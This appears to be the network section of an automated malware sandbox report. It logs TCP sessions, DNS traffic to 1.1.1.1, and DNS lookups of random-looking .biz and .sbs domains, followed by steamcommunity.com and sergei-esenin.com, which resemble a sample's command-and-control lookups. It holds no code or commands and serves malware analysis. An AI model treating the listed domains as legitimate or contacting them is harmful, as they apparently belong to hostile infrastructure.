                                                                                                                                                        Oct 13, 2024 01:43:19.101094961 CEST44349763188.114.97.3192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:19.559716940 CEST44349763188.114.97.3192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:19.559948921 CEST44349763188.114.97.3192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:19.560023069 CEST49763443192.168.2.6188.114.97.3
                                                                                                                                                        Oct 13, 2024 01:43:19.561994076 CEST49763443192.168.2.6188.114.97.3
                                                                                                                                                        Oct 13, 2024 01:43:19.562021971 CEST44349763188.114.97.3192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:19.562046051 CEST49763443192.168.2.6188.114.97.3
                                                                                                                                                        Oct 13, 2024 01:43:19.562060118 CEST44349763188.114.97.3192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:19.581954956 CEST49774443192.168.2.6188.114.97.3
                                                                                                                                                        Oct 13, 2024 01:43:19.581984043 CEST44349774188.114.97.3192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:19.583436012 CEST49774443192.168.2.6188.114.97.3
                                                                                                                                                        Oct 13, 2024 01:43:19.583472967 CEST49774443192.168.2.6188.114.97.3
                                                                                                                                                        Oct 13, 2024 01:43:19.583479881 CEST44349774188.114.97.3192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:20.068404913 CEST44349774188.114.97.3192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:20.068526030 CEST49774443192.168.2.6188.114.97.3
                                                                                                                                                        Oct 13, 2024 01:43:20.070173025 CEST49774443192.168.2.6188.114.97.3
                                                                                                                                                        Oct 13, 2024 01:43:20.070178986 CEST44349774188.114.97.3192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:20.070689917 CEST44349774188.114.97.3192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:20.071986914 CEST49774443192.168.2.6188.114.97.3
                                                                                                                                                        Oct 13, 2024 01:43:20.071986914 CEST49774443192.168.2.6188.114.97.3
                                                                                                                                                        Oct 13, 2024 01:43:20.072122097 CEST44349774188.114.97.3192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:20.533102989 CEST44349774188.114.97.3192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:20.533345938 CEST44349774188.114.97.3192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:20.533468962 CEST49774443192.168.2.6188.114.97.3
                                                                                                                                                        Oct 13, 2024 01:43:20.533523083 CEST49774443192.168.2.6188.114.97.3
                                                                                                                                                        Oct 13, 2024 01:43:20.533523083 CEST49774443192.168.2.6188.114.97.3
                                                                                                                                                        Oct 13, 2024 01:43:20.533550024 CEST44349774188.114.97.3192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:20.533562899 CEST44349774188.114.97.3192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:20.596239090 CEST49780443192.168.2.6104.21.33.249
                                                                                                                                                        Oct 13, 2024 01:43:20.596369982 CEST44349780104.21.33.249192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:20.596462965 CEST49780443192.168.2.6104.21.33.249
                                                                                                                                                        Oct 13, 2024 01:43:20.597135067 CEST49780443192.168.2.6104.21.33.249
                                                                                                                                                        Oct 13, 2024 01:43:20.597157955 CEST44349780104.21.33.249192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:21.104089975 CEST44349780104.21.33.249192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:21.104176044 CEST49780443192.168.2.6104.21.33.249
                                                                                                                                                        Oct 13, 2024 01:43:21.275130033 CEST49780443192.168.2.6104.21.33.249
                                                                                                                                                        Oct 13, 2024 01:43:21.275185108 CEST44349780104.21.33.249192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:21.276247025 CEST44349780104.21.33.249192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:21.278038979 CEST49780443192.168.2.6104.21.33.249
                                                                                                                                                        Oct 13, 2024 01:43:21.278109074 CEST49780443192.168.2.6104.21.33.249
                                                                                                                                                        Oct 13, 2024 01:43:21.278307915 CEST44349780104.21.33.249192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:21.763077974 CEST44349780104.21.33.249192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:21.763189077 CEST44349780104.21.33.249192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:21.763246059 CEST49780443192.168.2.6104.21.33.249
                                                                                                                                                        Oct 13, 2024 01:43:21.763377905 CEST49780443192.168.2.6104.21.33.249
                                                                                                                                                        Oct 13, 2024 01:43:21.763400078 CEST44349780104.21.33.249192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:21.763416052 CEST49780443192.168.2.6104.21.33.249
                                                                                                                                                        Oct 13, 2024 01:43:21.763422966 CEST44349780104.21.33.249192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:21.804024935 CEST49790443192.168.2.6104.21.77.78
                                                                                                                                                        Oct 13, 2024 01:43:21.804059982 CEST44349790104.21.77.78192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:21.804119110 CEST49790443192.168.2.6104.21.77.78
                                                                                                                                                        Oct 13, 2024 01:43:21.804932117 CEST49790443192.168.2.6104.21.77.78
                                                                                                                                                        Oct 13, 2024 01:43:21.804950953 CEST44349790104.21.77.78192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:22.294080973 CEST44349790104.21.77.78192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:22.294217110 CEST49790443192.168.2.6104.21.77.78
                                                                                                                                                        Oct 13, 2024 01:43:22.295711040 CEST49790443192.168.2.6104.21.77.78
                                                                                                                                                        Oct 13, 2024 01:43:22.295720100 CEST44349790104.21.77.78192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:22.296103001 CEST44349790104.21.77.78192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:22.297415972 CEST49790443192.168.2.6104.21.77.78
                                                                                                                                                        Oct 13, 2024 01:43:22.297549009 CEST49790443192.168.2.6104.21.77.78
                                                                                                                                                        Oct 13, 2024 01:43:22.297580004 CEST44349790104.21.77.78192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:22.728899002 CEST44349790104.21.77.78192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:22.729068041 CEST44349790104.21.77.78192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:22.729218006 CEST49790443192.168.2.6104.21.77.78
                                                                                                                                                        Oct 13, 2024 01:43:22.729496956 CEST49790443192.168.2.6104.21.77.78
                                                                                                                                                        Oct 13, 2024 01:43:22.729512930 CEST44349790104.21.77.78192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:22.779928923 CEST49799443192.168.2.6172.67.140.193
                                                                                                                                                        Oct 13, 2024 01:43:22.780009031 CEST44349799172.67.140.193192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:22.780141115 CEST49799443192.168.2.6172.67.140.193
                                                                                                                                                        Oct 13, 2024 01:43:22.780574083 CEST49799443192.168.2.6172.67.140.193
                                                                                                                                                        Oct 13, 2024 01:43:22.780610085 CEST44349799172.67.140.193192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:23.264194012 CEST44349799172.67.140.193192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:23.264267921 CEST49799443192.168.2.6172.67.140.193
                                                                                                                                                        Oct 13, 2024 01:43:23.267946005 CEST49799443192.168.2.6172.67.140.193
                                                                                                                                                        Oct 13, 2024 01:43:23.267956018 CEST44349799172.67.140.193192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:23.268347025 CEST44349799172.67.140.193192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:23.278661013 CEST49799443192.168.2.6172.67.140.193
                                                                                                                                                        Oct 13, 2024 01:43:23.278687000 CEST49799443192.168.2.6172.67.140.193
                                                                                                                                                        Oct 13, 2024 01:43:23.278825998 CEST44349799172.67.140.193192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:23.697592974 CEST44349799172.67.140.193192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:23.697810888 CEST44349799172.67.140.193192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:23.697943926 CEST49799443192.168.2.6172.67.140.193
                                                                                                                                                        Oct 13, 2024 01:43:23.698051929 CEST49799443192.168.2.6172.67.140.193
                                                                                                                                                        Oct 13, 2024 01:43:23.698103905 CEST44349799172.67.140.193192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:23.698131084 CEST49799443192.168.2.6172.67.140.193
                                                                                                                                                        Oct 13, 2024 01:43:23.698147058 CEST44349799172.67.140.193192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:23.717125893 CEST49806443192.168.2.6172.67.173.224
                                                                                                                                                        Oct 13, 2024 01:43:23.717226982 CEST44349806172.67.173.224192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:23.717334032 CEST49806443192.168.2.6172.67.173.224
                                                                                                                                                        Oct 13, 2024 01:43:23.753307104 CEST49806443192.168.2.6172.67.173.224
                                                                                                                                                        Oct 13, 2024 01:43:23.753329992 CEST44349806172.67.173.224192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:24.244060993 CEST44349806172.67.173.224192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:24.244297981 CEST49806443192.168.2.6172.67.173.224
                                                                                                                                                        Oct 13, 2024 01:43:24.249058008 CEST49806443192.168.2.6172.67.173.224
                                                                                                                                                        Oct 13, 2024 01:43:24.249090910 CEST44349806172.67.173.224192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:24.249528885 CEST44349806172.67.173.224192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:24.265197992 CEST49806443192.168.2.6172.67.173.224
                                                                                                                                                        Oct 13, 2024 01:43:24.265281916 CEST49806443192.168.2.6172.67.173.224
                                                                                                                                                        Oct 13, 2024 01:43:24.265379906 CEST44349806172.67.173.224192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:24.691692114 CEST44349806172.67.173.224192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:24.691880941 CEST44349806172.67.173.224192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:24.692090988 CEST49806443192.168.2.6172.67.173.224
                                                                                                                                                        Oct 13, 2024 01:43:24.692091942 CEST49806443192.168.2.6172.67.173.224
                                                                                                                                                        Oct 13, 2024 01:43:24.692192078 CEST49806443192.168.2.6172.67.173.224
                                                                                                                                                        Oct 13, 2024 01:43:24.692241907 CEST44349806172.67.173.224192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:24.715364933 CEST49813443192.168.2.6104.21.79.35
                                                                                                                                                        Oct 13, 2024 01:43:24.715460062 CEST44349813104.21.79.35192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:24.715543032 CEST49813443192.168.2.6104.21.79.35
                                                                                                                                                        Oct 13, 2024 01:43:24.715856075 CEST49813443192.168.2.6104.21.79.35
                                                                                                                                                        Oct 13, 2024 01:43:24.715884924 CEST44349813104.21.79.35192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:25.212927103 CEST44349813104.21.79.35192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:25.212994099 CEST49813443192.168.2.6104.21.79.35
                                                                                                                                                        Oct 13, 2024 01:43:25.214349985 CEST49813443192.168.2.6104.21.79.35
                                                                                                                                                        Oct 13, 2024 01:43:25.214365005 CEST44349813104.21.79.35192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:25.214773893 CEST44349813104.21.79.35192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:25.215976000 CEST49813443192.168.2.6104.21.79.35
                                                                                                                                                        Oct 13, 2024 01:43:25.216011047 CEST49813443192.168.2.6104.21.79.35
                                                                                                                                                        Oct 13, 2024 01:43:25.216048002 CEST44349813104.21.79.35192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:25.704351902 CEST44349813104.21.79.35192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:25.704571962 CEST44349813104.21.79.35192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:25.704657078 CEST49813443192.168.2.6104.21.79.35
                                                                                                                                                        Oct 13, 2024 01:43:25.704893112 CEST49813443192.168.2.6104.21.79.35
                                                                                                                                                        Oct 13, 2024 01:43:25.704938889 CEST44349813104.21.79.35192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:25.704966068 CEST49813443192.168.2.6104.21.79.35
                                                                                                                                                        Oct 13, 2024 01:43:25.704981089 CEST44349813104.21.79.35192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:25.721163034 CEST49819443192.168.2.6188.114.96.3
                                                                                                                                                        Oct 13, 2024 01:43:25.721256018 CEST44349819188.114.96.3192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:25.721364021 CEST49819443192.168.2.6188.114.96.3
                                                                                                                                                        Oct 13, 2024 01:43:25.722533941 CEST49819443192.168.2.6188.114.96.3
                                                                                                                                                        Oct 13, 2024 01:43:25.722569942 CEST44349819188.114.96.3192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:26.203128099 CEST44349819188.114.96.3192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:26.203356028 CEST49819443192.168.2.6188.114.96.3
                                                                                                                                                        Oct 13, 2024 01:43:26.205185890 CEST49819443192.168.2.6188.114.96.3
                                                                                                                                                        Oct 13, 2024 01:43:26.205216885 CEST44349819188.114.96.3192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:26.205488920 CEST44349819188.114.96.3192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:26.207139015 CEST49819443192.168.2.6188.114.96.3
                                                                                                                                                        Oct 13, 2024 01:43:26.207181931 CEST49819443192.168.2.6188.114.96.3
                                                                                                                                                        Oct 13, 2024 01:43:26.207223892 CEST44349819188.114.96.3192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:27.364264965 CEST44349819188.114.96.3192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:27.364458084 CEST44349819188.114.96.3192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:27.364665031 CEST49819443192.168.2.6188.114.96.3
                                                                                                                                                        Oct 13, 2024 01:43:27.364665031 CEST49819443192.168.2.6188.114.96.3
                                                                                                                                                        Oct 13, 2024 01:43:27.364665031 CEST49819443192.168.2.6188.114.96.3
                                                                                                                                                        Oct 13, 2024 01:43:27.376760006 CEST49826443192.168.2.6104.102.49.254
                                                                                                                                                        Oct 13, 2024 01:43:27.376806021 CEST44349826104.102.49.254192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:27.376933098 CEST49826443192.168.2.6104.102.49.254
                                                                                                                                                        Oct 13, 2024 01:43:27.377275944 CEST49826443192.168.2.6104.102.49.254
                                                                                                                                                        Oct 13, 2024 01:43:27.377295971 CEST44349826104.102.49.254192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:27.596733093 CEST49819443192.168.2.6188.114.96.3
                                                                                                                                                        Oct 13, 2024 01:43:27.596797943 CEST44349819188.114.96.3192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:28.102263927 CEST44349826104.102.49.254192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:28.102339029 CEST49826443192.168.2.6104.102.49.254
                                                                                                                                                        Oct 13, 2024 01:43:28.104480028 CEST49826443192.168.2.6104.102.49.254
                                                                                                                                                        Oct 13, 2024 01:43:28.104496002 CEST44349826104.102.49.254192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:28.104747057 CEST44349826104.102.49.254192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:28.106030941 CEST49826443192.168.2.6104.102.49.254
                                                                                                                                                        Oct 13, 2024 01:43:28.147433043 CEST44349826104.102.49.254192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:28.675801992 CEST44349826104.102.49.254192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:28.675865889 CEST44349826104.102.49.254192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:28.675879002 CEST49826443192.168.2.6104.102.49.254
                                                                                                                                                        Oct 13, 2024 01:43:28.675896883 CEST44349826104.102.49.254192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:28.675918102 CEST44349826104.102.49.254192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:28.675939083 CEST49826443192.168.2.6104.102.49.254
                                                                                                                                                        Oct 13, 2024 01:43:28.675951958 CEST44349826104.102.49.254192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:28.675976992 CEST49826443192.168.2.6104.102.49.254
                                                                                                                                                        Oct 13, 2024 01:43:28.721594095 CEST49826443192.168.2.6104.102.49.254
                                                                                                                                                        Oct 13, 2024 01:43:28.804502964 CEST44349826104.102.49.254192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:28.804553032 CEST44349826104.102.49.254192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:28.804584026 CEST49826443192.168.2.6104.102.49.254
                                                                                                                                                        Oct 13, 2024 01:43:28.804598093 CEST44349826104.102.49.254192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:28.804630995 CEST49826443192.168.2.6104.102.49.254
                                                                                                                                                        Oct 13, 2024 01:43:28.804652929 CEST49826443192.168.2.6104.102.49.254
                                                                                                                                                        Oct 13, 2024 01:43:28.811499119 CEST44349826104.102.49.254192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:28.811562061 CEST49826443192.168.2.6104.102.49.254
                                                                                                                                                        Oct 13, 2024 01:43:28.811599016 CEST44349826104.102.49.254192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:28.811706066 CEST49826443192.168.2.6104.102.49.254
                                                                                                                                                        Oct 13, 2024 01:43:28.811716080 CEST44349826104.102.49.254192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:28.811738014 CEST44349826104.102.49.254192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:28.811750889 CEST49826443192.168.2.6104.102.49.254
                                                                                                                                                        Oct 13, 2024 01:43:28.811774969 CEST44349826104.102.49.254192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:28.811795950 CEST49826443192.168.2.6104.102.49.254
                                                                                                                                                        Oct 13, 2024 01:43:28.811795950 CEST49826443192.168.2.6104.102.49.254
                                                                                                                                                        Oct 13, 2024 01:43:28.811805964 CEST44349826104.102.49.254192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:28.811814070 CEST44349826104.102.49.254192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:28.824771881 CEST49837443192.168.2.6172.67.206.204
                                                                                                                                                        Oct 13, 2024 01:43:28.824804068 CEST44349837172.67.206.204192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:28.824999094 CEST49837443192.168.2.6172.67.206.204
                                                                                                                                                        Oct 13, 2024 01:43:28.825295925 CEST49837443192.168.2.6172.67.206.204
                                                                                                                                                        Oct 13, 2024 01:43:28.825305939 CEST44349837172.67.206.204192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:29.332283974 CEST44349837172.67.206.204192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:29.332374096 CEST49837443192.168.2.6172.67.206.204
                                                                                                                                                        Oct 13, 2024 01:43:29.334050894 CEST49837443192.168.2.6172.67.206.204
                                                                                                                                                        Oct 13, 2024 01:43:29.334063053 CEST44349837172.67.206.204192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:29.334449053 CEST44349837172.67.206.204192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:29.336389065 CEST49837443192.168.2.6172.67.206.204
                                                                                                                                                        Oct 13, 2024 01:43:29.336415052 CEST49837443192.168.2.6172.67.206.204
                                                                                                                                                        Oct 13, 2024 01:43:29.336462021 CEST44349837172.67.206.204192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:29.470736027 CEST44349837172.67.206.204192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:29.470865965 CEST44349837172.67.206.204192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:29.470962048 CEST44349837172.67.206.204192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:29.470985889 CEST49837443192.168.2.6172.67.206.204
                                                                                                                                                        Oct 13, 2024 01:43:29.471019030 CEST44349837172.67.206.204192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:29.471066952 CEST49837443192.168.2.6172.67.206.204
                                                                                                                                                        Oct 13, 2024 01:43:29.471072912 CEST44349837172.67.206.204192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:29.471226931 CEST44349837172.67.206.204192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:29.471292019 CEST49837443192.168.2.6172.67.206.204
                                                                                                                                                        Oct 13, 2024 01:43:29.471376896 CEST49837443192.168.2.6172.67.206.204
                                                                                                                                                        Oct 13, 2024 01:43:29.471400023 CEST44349837172.67.206.204192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:29.471415043 CEST49837443192.168.2.6172.67.206.204
                                                                                                                                                        Oct 13, 2024 01:43:29.471420050 CEST44349837172.67.206.204192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:29.842771053 CEST49843443192.168.2.6172.67.206.204
                                                                                                                                                        Oct 13, 2024 01:43:29.842813969 CEST44349843172.67.206.204192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:29.842984915 CEST49843443192.168.2.6172.67.206.204
                                                                                                                                                        Oct 13, 2024 01:43:29.843333006 CEST49843443192.168.2.6172.67.206.204
                                                                                                                                                        Oct 13, 2024 01:43:29.843353033 CEST44349843172.67.206.204192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:30.337717056 CEST44349843172.67.206.204192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:30.337862968 CEST49843443192.168.2.6172.67.206.204
                                                                                                                                                        Oct 13, 2024 01:43:30.339554071 CEST49843443192.168.2.6172.67.206.204
                                                                                                                                                        Oct 13, 2024 01:43:30.339566946 CEST44349843172.67.206.204192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:30.339828014 CEST44349843172.67.206.204192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:30.340989113 CEST49843443192.168.2.6172.67.206.204
                                                                                                                                                        Oct 13, 2024 01:43:30.341008902 CEST49843443192.168.2.6172.67.206.204
                                                                                                                                                        Oct 13, 2024 01:43:30.341061115 CEST44349843172.67.206.204192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:30.773542881 CEST44349843172.67.206.204192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:30.773797989 CEST44349843172.67.206.204192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:30.773859978 CEST49843443192.168.2.6172.67.206.204
                                                                                                                                                        Oct 13, 2024 01:43:30.773941040 CEST49843443192.168.2.6172.67.206.204
                                                                                                                                                        Oct 13, 2024 01:43:30.773958921 CEST44349843172.67.206.204192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:30.773969889 CEST49843443192.168.2.6172.67.206.204
                                                                                                                                                        Oct 13, 2024 01:43:30.773977041 CEST44349843172.67.206.204192.168.2.6

                                                                                                                                                        UDP Packets

                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                        Oct 13, 2024 01:43:18.513829947 CEST5849853192.168.2.61.1.1.1
                                                                                                                                                        Oct 13, 2024 01:43:18.526278019 CEST53584981.1.1.1192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:19.566415071 CEST6520553192.168.2.61.1.1.1
                                                                                                                                                        Oct 13, 2024 01:43:19.578649998 CEST53652051.1.1.1192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:20.535904884 CEST5677653192.168.2.61.1.1.1
                                                                                                                                                        Oct 13, 2024 01:43:20.544681072 CEST53567761.1.1.1192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:20.583271027 CEST5518653192.168.2.61.1.1.1
                                                                                                                                                        Oct 13, 2024 01:43:20.595136881 CEST53551861.1.1.1192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:21.793998003 CEST6334653192.168.2.61.1.1.1
                                                                                                                                                        Oct 13, 2024 01:43:21.803072929 CEST53633461.1.1.1192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:22.766633034 CEST5272553192.168.2.61.1.1.1
                                                                                                                                                        Oct 13, 2024 01:43:22.779089928 CEST53527251.1.1.1192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:23.699707031 CEST6386253192.168.2.61.1.1.1
                                                                                                                                                        Oct 13, 2024 01:43:23.711344004 CEST53638621.1.1.1192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:24.703291893 CEST5401953192.168.2.61.1.1.1
                                                                                                                                                        Oct 13, 2024 01:43:24.714705944 CEST53540191.1.1.1192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:25.707037926 CEST5446653192.168.2.61.1.1.1
                                                                                                                                                        Oct 13, 2024 01:43:25.719238043 CEST53544661.1.1.1192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:27.367120981 CEST6302953192.168.2.61.1.1.1
                                                                                                                                                        Oct 13, 2024 01:43:27.376036882 CEST53630291.1.1.1192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:28.814397097 CEST5646453192.168.2.61.1.1.1
                                                                                                                                                        Oct 13, 2024 01:43:28.824029922 CEST53564641.1.1.1192.168.2.6

                                                                                                                                                        DNS Queries

                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                        Oct 13, 2024 01:43:18.513829947 CEST192.168.2.61.1.1.10xaf16Standard query (0)divewanntwj.bizA (IP address)IN (0x0001)false
                                                                                                                                                        Oct 13, 2024 01:43:19.566415071 CEST192.168.2.61.1.1.10xff7Standard query (0)mathcucom.sbsA (IP address)IN (0x0001)false
                                                                                                                                                        Oct 13, 2024 01:43:20.535904884 CEST192.168.2.61.1.1.10x684Standard query (0)allocatinow.sbsA (IP address)IN (0x0001)false
                                                                                                                                                        Oct 13, 2024 01:43:20.583271027 CEST192.168.2.61.1.1.10xf87bStandard query (0)enlargkiw.sbsA (IP address)IN (0x0001)false
                                                                                                                                                        Oct 13, 2024 01:43:21.793998003 CEST192.168.2.61.1.1.10xac61Standard query (0)resinedyw.sbsA (IP address)IN (0x0001)false
                                                                                                                                                        Oct 13, 2024 01:43:22.766633034 CEST192.168.2.61.1.1.10xd8e7Standard query (0)vennurviot.sbsA (IP address)IN (0x0001)false
                                                                                                                                                        Oct 13, 2024 01:43:23.699707031 CEST192.168.2.61.1.1.10xa1f3Standard query (0)ehticsprocw.sbsA (IP address)IN (0x0001)false
                                                                                                                                                        Oct 13, 2024 01:43:24.703291893 CEST192.168.2.61.1.1.10x5ea1Standard query (0)condifendteu.sbsA (IP address)IN (0x0001)false
                                                                                                                                                        Oct 13, 2024 01:43:25.707037926 CEST192.168.2.61.1.1.10x5815Standard query (0)drawwyobstacw.sbsA (IP address)IN (0x0001)false
                                                                                                                                                        Oct 13, 2024 01:43:27.367120981 CEST192.168.2.61.1.1.10xd013Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                        Oct 13, 2024 01:43:28.814397097 CEST192.168.2.61.1.1.10xcfdcStandard query (0)sergei-esenin.comA (IP address)IN (0x0001)false

                                                                                                                                                        DNS Answers

                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                        Oct 13, 2024 01:43:18.526278019 CEST1.1.1.1192.168.2.60xaf16No error (0)divewanntwj.biz188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                        Oct 13, 2024 01:43:18.526278019 CEST1.1.1.1192.168.2.60xaf16No error (0)divewanntwj.biz188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                        Oct 13, 2024 01:43:19.578649998 CEST1.1.1.1192.168.2.60xff7No error (0)mathcucom.sbs188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                        Oct 13, 2024 01:43:19.578649998 CEST1.1.1.1192.168.2.60xff7No error (0)mathcucom.sbs188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                        Oct 13, 2024 01:43:20.544681072 CEST1.1.1.1192.168.2.60x684Name error (3)allocatinow.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                        Oct 13, 2024 01:43:20.595136881 CEST1.1.1.1192.168.2.60xf87bNo error (0)enlargkiw.sbs104.21.33.249A (IP address)IN (0x0001)false
                                                                                                                                                        Oct 13, 2024 01:43:20.595136881 CEST1.1.1.1192.168.2.60xf87bNo error (0)enlargkiw.sbs172.67.152.13A (IP address)IN (0x0001)false
                                                                                                                                                        Oct 13, 2024 01:43:21.803072929 CEST1.1.1.1192.168.2.60xac61No error (0)resinedyw.sbs104.21.77.78A (IP address)IN (0x0001)false
                                                                                                                                                        Oct 13, 2024 01:43:21.803072929 CEST1.1.1.1192.168.2.60xac61No error (0)resinedyw.sbs172.67.205.156A (IP address)IN (0x0001)false
                                                                                                                                                        Oct 13, 2024 01:43:22.779089928 CEST1.1.1.1192.168.2.60xd8e7No error (0)vennurviot.sbs172.67.140.193A (IP address)IN (0x0001)false
                                                                                                                                                        Oct 13, 2024 01:43:22.779089928 CEST1.1.1.1192.168.2.60xd8e7No error (0)vennurviot.sbs104.21.46.170A (IP address)IN (0x0001)false
                                                                                                                                                        Oct 13, 2024 01:43:23.711344004 CEST1.1.1.1192.168.2.60xa1f3No error (0)ehticsprocw.sbs172.67.173.224A (IP address)IN (0x0001)false
